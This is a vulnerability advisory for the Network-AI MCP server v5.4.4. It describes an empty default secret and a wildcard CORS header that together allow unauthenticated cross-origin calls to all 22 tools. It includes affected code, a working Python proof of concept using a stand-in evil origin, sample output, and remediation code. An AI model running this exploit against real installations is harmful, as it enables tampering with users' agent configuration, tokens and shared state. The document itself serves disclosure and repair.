Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

# Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret | Field | Value | | ---------------- | ----- | | Repository | Jovancoding/Network-AI | | Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) | ## Summary The MCP SSE server defaults to an empty secret (`process.env['NETWORK_AI_MCP_SECRET'] ?? ''` at `bin/mcp-server.ts:89`), which causes `_isAuthorized` (`lib/mcp-transport-sse.ts:254`) to return `true` unconditionally for every request — no `Authorization` header is required. Simultaneously, `_handleRequest` sets `Access-Control-Allow-Origin: *` (`lib/mcp-transport-sse.ts:272`) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including `config_set`, `agent_spawn`, and `blackboard_write` — against a default-configured localhost server. ## Affected Code `bin/mcp-server.ts:89` — default secret resolves to empty string, enabling open access ```typescript secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '', ``` `lib/mcp-transport-sse.ts:254` — auth guard short-circuits to `true` when secret is falsy ```typescript private _isAuthorized(req: http.IncomingMessage): boolean { if (!this._opts.secret) return true; const authHeader = req.headers['authorization']; if (typeof authHeader !== 'string') return false; const parts = authHeader.split(' '); return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret; } ``` `lib/mcp-transport-sse.ts:272` — wildcard CORS header applied unconditionally before any auth check ```typescript private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void { // CORS — allow any MCP client to connect res.setHeader('Access-Control-Allow-Origin', '*'); res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS'); res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization'); ``` `lib/mcp-transport-sse.ts:367-368` — authenticated path dispatches parsed JSON-RPC frame directly to `handleRPC` with no further caller validation ```typescript const rpc = JSON.parse(body) as McpJsonRpcRequest; const response = await this._bridge.handleRPC(rpc); ``` Any cross-origin browser request reaches `handleRPC` because `_isAuthorized` returns `true` (empty secret) and the `Access-Control-Allow-Origin: *` header lets the browser expose the response to the calling script. ## Proof of Concept **Environment** - Network-AI v5.4.4 (latest) - Docker container bound to `127.0.0.1:3001` - Python 3 + `requests` **poc.py** ```python import sys import requests BASE = "http://127.0.0.1:3001" # Step 1: Verify CORS wildcard (simulating cross-origin preflight) preflight = requests.options( f"{BASE}/mcp", headers={ "Origin": "http://evil.example.com", "Access-Control-Request-Method": "POST", "Access-Control-Request-Headers": "Content-Type", }, ) acao = preflight.headers.get("Access-Control-Allow-Origin", "") print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}") if acao != "*": print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}") sys.exit(1) # Step 2: Invoke config_set with NO Authorization header from cross-origin rpc_payload = { "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "config_set", "arguments": { "key": "maxParallelAgents", "value": "999" } } } resp = requests.post( f"{BASE}/mcp", json=rpc_payload, headers={ "Content-Type": "application/json", "Origin": "http://evil.example.com", # No Authorization header — exploiting empty-secret bypass }, ) print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}") print(f"[*] Response body: {resp.text[:800]}") resp_acao = resp.headers.get("Access-Control-Allow-Origin", "") print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}") if resp.status_code != 200: print(f"RESULT: FAIL — expected 200, got {resp.status_code}") sys.exit(1) body = resp.json() result_content = body.get("result", {}) is_error = result_content.get("isError", True) if is_error: print(f"RESULT: FAIL — tool returned isError=true: {result_content}") sys.exit(1) # Step 3: Confirm CORS header on actual response (browser can read it) if resp_acao != "*": print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}") sys.exit(1) print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)") ``` **Output** ``` [*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*' [*] POST /mcp (no auth, cross-origin) -> 200 [*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}} [*] Response Access-Control-Allow-Origin: '*' RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999) ``` **Verified conditions** 1. `OPTIONS /mcp` → 204, `Access-Control-Allow-Origin: *` — browser preflight accepted by server 2. `POST /mcp` (no Authorization header) → 200, `isError: false` — `config_set` executed without credentials 3. Response `Access-Control-Allow-Origin: *` — response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page ## Impact Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (`config_set`); the same vector applies to `agent_spawn` (spawning arbitrary agents), `blackboard_write` / `blackboard_delete` (corrupting shared agent state), and `token_create` / `token_revoke` (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration). ## Remediation 1. **Require a non-empty secret at startup**: in `bin/mcp-server.ts`, reject launch when `args.secret` is empty and `--stdio` is not set: ```typescript if (!args.secret && !args.stdio) { console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.'); process.exit(1); } ``` 2. **Restrict CORS to localhost origins only**: in `lib/mcp-transport-sse.ts:_handleRequest`, replace the wildcard with an allowlist: ```typescript const origin = req.headers['origin'] ?? ''; const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); res.setHeader('Access-Control-Allow-Origin', allowed ? origin : ''); res.setHeader('Vary', 'Origin'); ``` 3. **Move CORS headers after the auth check** so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (`/sse`) if cross-origin streaming is needed and not on `/mcp`.